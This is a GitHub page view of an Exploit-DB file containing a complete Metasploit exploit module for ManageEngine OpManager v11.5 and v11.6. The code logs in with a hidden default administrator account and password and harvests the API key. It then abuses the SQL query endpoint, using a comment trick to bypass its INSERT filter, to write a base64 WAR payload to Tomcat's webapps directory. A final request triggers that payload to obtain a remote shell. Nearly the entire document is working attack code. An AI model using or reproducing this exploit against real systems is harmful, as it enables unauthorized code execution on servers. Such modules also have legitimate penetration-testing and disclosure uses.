forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path38221.rb
More file actions
executable file
·180 lines (151 loc) · 5.92 KB
/
Copy path38221.rb
File metadata and controls
executable file
·180 lines (151 loc) · 5.92 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
# It removes large object in database, shoudn't be a problem, but just in case....
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'ManageEngine OpManager Remote Code Execution',
'Description' => %q{
This module exploits a default credential vulnerability in ManageEngine OpManager, where a
default hidden account "IntegrationUser" with administrator privileges exists. The account
has a default password of "plugin" which can not be reset through the user interface. By
log-in and abusing the default administrator's SQL query functionality, it's possible to
write a WAR payload to disk and trigger an automatic deployment of this payload. This
module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
],
'References' =>
[
[ 'EDB', '38174' ],
],
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
'Targets' =>
[
['ManageEngine OpManager v11.6', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Sep 14 2015',
'DefaultTarget' => 0))
end
def uri
target_uri.path
end
def check
# Check version
vprint_status("#{peer} - Trying to detect ManageEngine OpManager")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'LoginPage.do')
})
unless res && res.code == 200
return Exploit::CheckCode::Safe
end
if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/
version = $1
if Gem::Version.new(version) <= Gem::Version.new('11.6')
return Exploit::CheckCode::Appears
else
# Patch unknown
return Exploit::CheckCode::Detected
end
elsif res.body =~ /OpManager/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def sql_query( key, query )
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'),
'vars_get' => { 'apiKey' => key },
'vars_post' => { 'query' => query }
})
unless res && res.code == 200
fail_with(Failure::Unknown, "#{peer} - Query was not succesful!")
end
res
end
def exploit
print_status("#{peer} - Access login page")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'jsp', 'Login.do'),
'vars_post' => {
'domainName' => 'NULL',
'authType' => 'localUserLogin',
'userName' => 'IntegrationUser', # Hidden user
'password' => 'plugin' # Password of hidden user
}
})
if res && res.code == 302
redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "")
print_status("#{peer} - Location is [ #{redirect} ]")
else
fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")
end
# Follow redirection process
print_status("#{peer} - Following redirection")
res = send_request_cgi({
'uri' => redirect,
'method' => 'GET'
})
if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/
api_key = $1
print_status("#{peer} - Retrieved API key [ #{api_key} ]")
else
fail_with(Failure::Unknown, "#{peer} - Redirect failed!")
end
app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => app_base }).to_s
war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '')
print_status("#{peer} - Executing SQL queries")
# Remove large object in database, just in case it exists from previous exploit attempts
sql = 'SELECT lo_unlink(-1)'
sql_query(api_key, sql)
# Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
sql = 'SELECT lo_create(-1)'
result = sql_query(api_key, sql)
if result.body =~ /lo_create":([0-9]+)}/
lo_id = $1
else
fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")
end
# Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc.
sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))"
sql_query(api_key, sql)
# Export our large object id data into a WAR file
sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');"
sql_query(api_key, sql)
# Remove our large object in the database
sql = 'SELECT lo_unlink(-1)'
sql_query(api_key, sql)
register_file_for_cleanup("tomcat//webapps//#{app_base}.war")
register_file_for_cleanup("tomcat//webapps//#{app_base}")
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end